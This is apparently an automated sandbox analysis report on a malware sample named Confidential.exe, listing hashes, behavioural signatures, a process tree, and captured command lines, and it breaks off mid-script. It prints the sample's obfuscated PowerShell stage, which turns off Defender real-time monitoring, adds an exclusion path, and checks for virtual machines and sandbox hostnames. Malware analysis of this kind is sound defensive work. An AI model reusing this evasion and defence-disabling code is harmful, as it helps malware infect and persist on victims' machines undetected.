Analysis
-
max time kernel
141s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2023 05:48
Behavioral task
behavioral1
Sample
Confidential.exe
Resource
win7-20230621-en
General
-
Target
Confidential.exe
-
Size
6.3MB
-
MD5
fccbea6f574c7e047b761e3532707dc1
-
SHA1
ed32c1494e8b4394616e846eb2f5dacb02cb5b40
-
SHA256
9abe0ca0b62f85b93c77599e28ad4383972b9b2731735c0d35a1d57c1edf50cc
-
SHA512
c4c55a1603f0f903d7f20b555c9c27c342a0c174ec0a17425e8bc920a0838a082d3918f280dc378c4b6d9e0d6d60a510bd51061592523cfda5a82653e77d5bfe
-
SSDEEP
196608:yLBtOdQmRJ8dA6lXCy1ArqkVpKCX+PrF4ZIegh0EVZ:+BodQuslXrAZYCuPJOIeg2u
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 33 2964 powershell.exe 80 2964 powershell.exe 81 2964 powershell.exe 82 2964 powershell.exe 84 2964 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe powershell.exe -
Loads dropped DLL 7 IoCs
pid Process 1236 Confidential.exe 1236 Confidential.exe 1236 Confidential.exe 1236 Confidential.exe 1236 Confidential.exe 1236 Confidential.exe 1236 Confidential.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1236 Confidential.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2e493086-8d69-4707-ae84-6bfde2705647.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230701054904.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4548 powershell.exe 4548 powershell.exe 2964 powershell.exe 2964 powershell.exe 3288 msedge.exe 3288 msedge.exe 3232 msedge.exe 3232 msedge.exe 5432 identity_helper.exe 5432 identity_helper.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4548 powershell.exe Token: SeIncreaseQuotaPrivilege 4548 powershell.exe Token: SeSecurityPrivilege 4548 powershell.exe Token: SeTakeOwnershipPrivilege 4548 powershell.exe Token: SeLoadDriverPrivilege 4548 powershell.exe Token: SeSystemProfilePrivilege 4548 powershell.exe Token: SeSystemtimePrivilege 4548 powershell.exe Token: SeProfSingleProcessPrivilege 4548 powershell.exe Token: SeIncBasePriorityPrivilege 4548 powershell.exe Token: SeCreatePagefilePrivilege 4548 powershell.exe Token: SeBackupPrivilege 4548 powershell.exe Token: SeRestorePrivilege 4548 powershell.exe Token: SeShutdownPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeSystemEnvironmentPrivilege 4548 powershell.exe Token: SeRemoteShutdownPrivilege 4548 powershell.exe Token: SeUndockPrivilege 4548 powershell.exe Token: SeManageVolumePrivilege 4548 powershell.exe Token: 33 4548 powershell.exe Token: 34 4548 powershell.exe Token: 35 4548 powershell.exe Token: 36 4548 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeIncreaseQuotaPrivilege 2964 powershell.exe Token: SeSecurityPrivilege 2964 powershell.exe Token: SeTakeOwnershipPrivilege 2964 powershell.exe Token: SeLoadDriverPrivilege 2964 powershell.exe Token: SeSystemProfilePrivilege 2964 powershell.exe Token: SeSystemtimePrivilege 2964 powershell.exe Token: SeProfSingleProcessPrivilege 2964 powershell.exe Token: SeIncBasePriorityPrivilege 2964 powershell.exe Token: SeCreatePagefilePrivilege 2964 powershell.exe Token: SeBackupPrivilege 2964 powershell.exe Token: SeRestorePrivilege 2964 powershell.exe Token: SeShutdownPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeSystemEnvironmentPrivilege 2964 powershell.exe Token: SeRemoteShutdownPrivilege 2964 powershell.exe Token: SeUndockPrivilege 2964 powershell.exe Token: SeManageVolumePrivilege 2964 powershell.exe Token: 33 2964 powershell.exe Token: 34 2964 powershell.exe Token: 35 2964 powershell.exe Token: 36 2964 powershell.exe Token: SeIncreaseQuotaPrivilege 2964 powershell.exe Token: SeSecurityPrivilege 2964 powershell.exe Token: SeTakeOwnershipPrivilege 2964 powershell.exe Token: SeLoadDriverPrivilege 2964 powershell.exe Token: SeSystemProfilePrivilege 2964 powershell.exe Token: SeSystemtimePrivilege 2964 powershell.exe Token: SeProfSingleProcessPrivilege 2964 powershell.exe Token: SeIncBasePriorityPrivilege 2964 powershell.exe Token: SeCreatePagefilePrivilege 2964 powershell.exe Token: SeBackupPrivilege 2964 powershell.exe Token: SeRestorePrivilege 2964 powershell.exe Token: SeShutdownPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeSystemEnvironmentPrivilege 2964 powershell.exe Token: SeRemoteShutdownPrivilege 2964 powershell.exe Token: SeUndockPrivilege 2964 powershell.exe Token: SeManageVolumePrivilege 2964 powershell.exe Token: 33 2964 powershell.exe Token: 34 2964 powershell.exe Token: 35 2964 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 372 wrote to memory of 1236 372 Confidential.exe 82 PID 372 wrote to memory of 1236 372 Confidential.exe 82 PID 1236 wrote to memory of 3772 1236 Confidential.exe 84 PID 1236 wrote to memory of 3772 1236 Confidential.exe 84 PID 1236 wrote to memory of 4548 1236 Confidential.exe 86 PID 1236 wrote to memory of 4548 1236 Confidential.exe 86 PID 1236 wrote to memory of 4436 1236 Confidential.exe 90 PID 1236 wrote to memory of 4436 1236 Confidential.exe 90 PID 1236 wrote to memory of 2964 1236 Confidential.exe 91 PID 1236 wrote to memory of 2964 1236 Confidential.exe 91 PID 4436 wrote to memory of 3232 4436 cmd.exe 94 PID 4436 wrote to memory of 3232 4436 cmd.exe 94 PID 3232 wrote to memory of 8 3232 msedge.exe 97 PID 3232 wrote to memory of 8 3232 msedge.exe 97 PID 2964 wrote to memory of 4680 2964 powershell.exe 98 PID 2964 wrote to memory of 4680 2964 powershell.exe 98 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 2564 3232 msedge.exe 99 PID 3232 wrote to memory of 3288 3232 msedge.exe 100 PID 3232 wrote to memory of 3288 3232 msedge.exe 100 PID 3232 wrote to memory of 2068 3232 msedge.exe 101 PID 3232 wrote to memory of 2068 3232 msedge.exe 101 PID 3232 wrote to memory of 2068 3232 msedge.exe 101 PID 3232 wrote to memory of 2068 3232 msedge.exe 101 PID 3232 wrote to memory of 2068 3232 msedge.exe 101 PID 3232 wrote to memory of 2068 3232 msedge.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Confidential.exe"C:\Users\Admin\AppData\Local\Temp\Confidential.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Admin\AppData\Local\Temp\Confidential.exe"C:\Users\Admin\AppData\Local\Temp\Confidential.exe"2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3722\Confidential.pdf"3⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\_MEI3722\Confidential.pdf4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffebd1246f8,0x7ffebd124708,0x7ffebd1247185⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:25⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:85⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:15⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:15⤵PID:1740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:15⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5236 /prefetch:65⤵PID:2680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:15⤵PID:1872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:15⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:85⤵PID:3044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:4676 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff771885460,0x7ff771885470,0x7ff7718854806⤵PID:2864
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:15⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:15⤵PID:5448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:5576
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2023-07-10).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd function IsInWindowsSandbox { $inSandbox = $false $env:SandboxProfilePath = $null $env:SandboxUid = $null if ($env:WSB_IsHostEnvironment -eq \"1\" -and $env:WSB_Sandboxed -eq \"1\") { $inSandbox = $true $env:SandboxProfilePath = $env:WSB_ProfilePath $env:SandboxUid = $env:WSB_Uid } return $inSandbox } curl ChwmDW.coms if (IsInWindowsSandbox) { exit } else { if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $ErrorActionPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\";Set-MpPreference -DisableRealtimeMonitoring $true $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { $HNAME2023=hostname if ($HNAME2023 -eq '0'+'0'+'9'+'0'+'0'+'B'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '0'+'C'+'C'+'4'+'7'+'A'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '6'+'C'+'4'+'E'+'7'+'3'+'3'+'F'+'-'+'C'+'2'+'D'+'9'+'-'+'4') { exit } if ($HNAME2023 -eq 'A'+'C'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'I'+'D'+'A'+'N'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'E'+'N'+'M'+'O'+'O'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'I'+'O'+'N'+'E') { exit } if ($HNAME2023 -eq 'A'+'P'+'P'+'O'+'N'+'F'+'L'+'Y'+'-'+'V'+'P'+'S') { exit } if ($HNAME2023 -eq 'A'+'R'+'C'+'H'+'I'+'B'+'A'+'L'+'D'+'P'+'C') { exit } if ($HNAME2023 -eq 'a'+'z'+'u'+'r'+'e') { exit } if ($HNAME2023 -eq 'B'+'3'+'0'+'F'+'0'+'2'+'4'+'2'+'-'+'1'+'C'+'6'+'A'+'-'+'4') { exit } if ($HNAME2023 -eq 'B'+'A'+'R'+'O'+'S'+'I'+'N'+'O'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'C'+'K'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'E'+'7'+'3'+'7'+'0'+'C'+'-'+'8'+'C'+'0'+'C'+'-'+'4') { exit } if ($HNAME2023 -eq 'C'+'O'+'F'+'F'+'E'+'E'+'-'+'S'+'H'+'O'+'P') { exit } if ($HNAME2023 -eq 'C'+'O'+'M'+'P'+'N'+'A'+'M'+'E'+'_'+'4'+'0'+'4'+'7') { exit } if ($HNAME2023 -eq 'd'+'1'+'b'+'n'+'J'+'k'+'f'+'V'+'l'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'9'+'O'+'L'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'P'+'Y'+'K'+'P'+'2'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'Y'+'2'+'4'+'3'+'3'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'4'+'U'+'8'+'D'+'T'+'F'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'4'+'X'+'G'+'X'+'6'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'O'+'V'+'9'+'S'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'A'+'K'+'Q'+'Q'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'B'+'M'+'F'+'T'+'6'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'0'+'T'+'5'+'S'+'D'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'A'+'F'+'S'+'T'+'D'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'X'+'C'+'6'+'G'+'E'+'Z') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'8'+'K'+'9'+'D'+'9'+'3'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'H'+'G'+'X'+'K'+'T'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'L'+'B'+'E'+'R'+'T'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'0'+'T'+'9'+'3'+'D'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'G'+'N'+'5'+'L'+'8'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'U'+'G'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'X'+'J'+'Y'+'A'+'E'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'B'+'G'+'P'+'F'+'E'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'D'+'Q'+'E'+'7'+'V'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'H'+'A'+'Y'+'A'+'N'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'M'+'0'+'D'+'A'+'W'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'N'+'F'+'V'+'L'+'M'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'R'+'C'+'C'+'C'+'O'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'0'+'1'+'9'+'G'+'D'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'4'+'F'+'E'+'N'+'3'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'E'+'3'+'6'+'9'+'S'+'E') { exit } if ($HNAME2023 -eq 